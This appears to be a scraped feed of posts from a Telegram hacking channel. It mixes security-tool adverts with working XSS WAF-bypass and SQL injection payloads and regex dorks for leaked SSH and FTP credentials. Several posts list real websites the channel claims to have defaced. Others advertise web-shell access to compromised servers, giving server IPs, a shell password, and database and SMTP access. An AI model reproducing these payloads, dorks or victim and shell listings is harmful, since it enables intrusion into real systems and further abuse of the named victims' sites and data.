The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔑 LEAKEY 🔑

LEAKEY is a bash script which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

💬
LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The script is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.

LEAKEY uses a json based signature file located at ~/.leakey/signatures.json
The idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.

LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the signatures.json file

👤 Requirements:
⚪️ jq

🔼 Installation:

curl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh

💻 Usage:
After running the installation command, simply run the below in your terminal

leaky

📊 Adding Checks:
All the checks for LEAKEY are defined in the signatures.json file.
To add any new checks, simply appened the signatures file at ~/.leakey/signatures.json

{
    "id": 0,
    "name": "Slack API Token",
    "args": [
      "token"
    ],
    "command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
  }

😸 Github

⬇️ Download
🔒 BugCod3

#RedTeam #BugHunter #Leaked #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site
👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [🇸🇬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link
pwd: bugcod3

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 Site:
https://fnsir.ru/
https://dzhakkolo.fnsir.ru/index.html
https://kerling.fnsir.ru/index.html
https://kornhol.fnsir.ru/index.html
https://krokinol.fnsir.ru/index.html
https://novus.fnsir.ru/index.html
https://shafflbord.fnsir.ru/index.html
https://worldnovuss.com/index.html

👁‍🗨 Mirror-h

Country: 🇷🇺

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/

👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [🇺🇸]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 Site:
https://appie.ru/index.html
http://skupix.su/index.html
https://skupka-spb.ru/index.html
http://skypka.tv/index.html

👁‍🗨 Mirror-h

📊 Database

Country: 🇷🇺

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bypass Cloudflare WAF (XSS without parentheses)

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #bugbountytips #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Akamai WAF (new, requires a click to pop)

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>

Vector PoC

#XSS #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🐱 SiCat 🐱

The useful exploit finder

💬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:

pip  install  -r  requirements.txt

💻 Usage:

python sicat.py --help

📂 Example:
From keyword:

python sicat -k telerik --exploitdb --msfmodule

From nmap output:

nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm

😸 Github

⬇️ Download
🔒 BugCod3

#Exploit #Metasploit #Finder
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔥New Triaged report Sql Injection 😍 > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW

MySQL

#bugbountytip #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
http://kk-qq.work/index.html
https://comls.co.jp/BugCod3.html
http://comls.jp/BugCod3.html
http://hagakure.pro/index.html
http://tanpopo12.work/index.html
http://lanciaconstructora.com/

👁‍🗨 Mirror-h

Country: 🇯🇵🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Free Shell

🔗 Link

#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://apsgevents.com/
https://giftimprint.com/
http://kulibangunan.giftimprint.com/
https://mail.giftimprint.com/
https://redstarfilms.net/
https://mail.redstarfilms.net/
https://tropicanarestaurants.com/
https://mail.tropicanarestaurants.com/

👁‍🗨 Mirror-h

📊 Database

🛡 Smtp

📧 LeafMailer

🔒 bugcod3

Country: 🇺🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#bugbountytips #bugbounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Command Injection Payload List

⬇️ Download

#Payload #Command #Injection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

☠️ xnLinkFinder v4.4 ☠️

💬
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

📊 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
⚪️ crawling a target (pass a domain/URL)
⚪️ crawling multiple targets (pass a file of domains/URLs)
⚪️ searching files in a given directory (pass a directory name)
⚪️ get them from a Burp project (pass location of a Burp XML file)
⚪️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
⚪️ get them from a Caido project (pass location of a Caido export CSV file)
⚪️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

🔼 Installation:

cd xnLinkFinder
sudo python setup.py install

💻 Usage:

python xnLinkFinder.py --help

📂 Examples:

#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com

😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #Discover #Endpoints
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

NetProbe: Network Probe

💬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

📊 Features:
⚪️ Scan for devices on a specified IP address or subnet
⚪️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
⚪️ Live tracking of devices (optional)
⚪️ Save scan results to a file (optional)
⚪️ Filter by manufacturer (e.g., 'Apple') (optional)
⚪️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
⚪️ Scan rate in seconds (default: 5) (optional)

🔼 Installation:

cd NetProbe
pip install -r requirements.txt

💻 Usage:

python3 netprobe.py —help

📂 Example:

python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Network #Scanner #Vulnerability #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/

👁‍🗨 Mirror-h

📊 Database (tridentresortsholidays.com)

Country: 🇺🇸🇮🇹

#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [🇮🇹]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

🔗 Link

Enjoy... ⭐️

#Shell
➖➖➖➖➖➖➖➖➖➖
🔥 0Day.Today
📣 T.me/BugCod3
📣 T.me/LearnExploit